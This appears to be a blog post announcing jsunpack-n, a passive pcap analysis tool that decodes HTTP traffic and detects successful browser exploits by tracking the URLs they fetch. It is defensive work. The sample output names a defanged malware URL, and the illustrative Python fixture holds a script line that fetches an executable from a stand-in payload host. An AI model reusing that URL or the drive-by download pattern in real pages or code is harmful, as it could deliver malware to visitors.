I built a basic implementation of this concept as a new version of "jsunpack-network" (or jsunpack-n). Some of the benefits of this technique are:
- Tracks TCP streams and decodes the Transfer-Encoding and Content-Encoding types chunked and gzip.
- Completely passive: there is no need to worry about User-Agents, proxies, or other tricks that attackers use to prevent analysis.
- Detects whether an exploit is successful: the system monitors all URLs. It can determine if an exploit would fetch another URL, and when the client later requests that URL, the system knows that the exploit was successful.
The source code for this project is available from http://jsunpack.jeek.org/jsunpack-n.tgz. Here is an example output using the test file (included in the jsunpack-n.tgz archive):
$ ./jsunpack-n.py sample-http-exploit.pcap
exploit_watch append hxxp://hifgejig.cn/nuc/exe.php
The exploit_watch variable tracks all URLs so the script can tell whether an exploit is successful; if it is, the script prints the associated IP addresses and URLs:
print 'Exploit Successful ', tcp.addr, ' from URL ', exploit_watch[host+url]
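As an added illustration (not jsunpack-n's own code), the following Python models the exploit_watch logic described above on a constructed sequence of request/response records. The record format and the regex URL extraction are simplifications I assume for the demo; the real tool works from a pcap and takes the URLs from its JavaScript decoding.

```python
import re
from urllib.parse import urlsplit

# Any absolute URL found in a decoded response body. jsunpack-n derives these
# from its JavaScript emulation; a plain regex is the simplification here.
URL_RE = re.compile(r'https?://[^\s\'"<>()]+')

def url_key(url):
    # normalise to the host+path form the watch list is keyed on
    p = urlsplit(url)
    return p.netloc.lower() + (p.path or '/')

class ExploitWatch:
    def __init__(self):
        self.watch = {}       # host+path -> URL of the page that would fetch it
        self.successful = []  # (client, fetched URL, originating URL)

    def on_response(self, page_url, body):
        # a body (already de-chunked/gunzipped) that references another URL
        # puts that URL on watch, remembering which page it came from
        for u in URL_RE.findall(body):
            self.watch.setdefault(url_key(u), page_url)

    def on_request(self, client, url):
        # a later client request for a watched URL means the exploit ran
        origin = self.watch.get(url_key(url))
        if origin is None:
            return False
        self.successful.append((client, url, origin))
        return True

def replay(records):
    """Feed ('req', client, url) / ('resp', url, body) records in capture
    order and return the (client, url, origin) successes found."""
    ew = ExploitWatch()
    for rec in records:
        if rec[0] == 'resp':
            ew.on_response(rec[1], rec[2])
        else:
            ew.on_request(rec[1], rec[2])
    return ew.successful

# Constructed sample session (not real traffic): a landing page whose script
# would fetch exe.php, followed by the victim actually requesting exe.php.
SAMPLE = [
    ('req',  '10.0.0.5', 'http://landing.example/index.html'),
    ('resp', 'http://landing.example/index.html',
     '<script>var s="http://payload.example/nuc/exe.php";fetch(s)</script>'),
    ('req',  '10.0.0.5', 'http://payload.example/nuc/exe.php'),
]
```

Calling replay(SAMPLE) returns one success tuple naming the client, the fetched exe.php URL and the landing page it was watched from; without the final request it returns an empty list.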
Since this project is very new, I expect there will be a few issues, so you run this at your own risk. I am releasing this code as alpha/unstable because I think there is a lot of opportunity to improve it.
Two areas that are completely lacking at this point are:
- signature-based detection
- pdf decoding
I am releasing a PDF decoding script, "pdf.py", with this code, available in the jsunpack-n.tgz archive; however, I haven't integrated it with jsunpack-n yet. While this should be a simple task, I'm still testing and improving the PDF decoding, as it currently handles only a few of the decoding techniques I'd like it to support.
Please leave me your comments (good or bad) to improve the project. I haven't fully integrated jsunpack's algorithms yet (I will soon, I promise).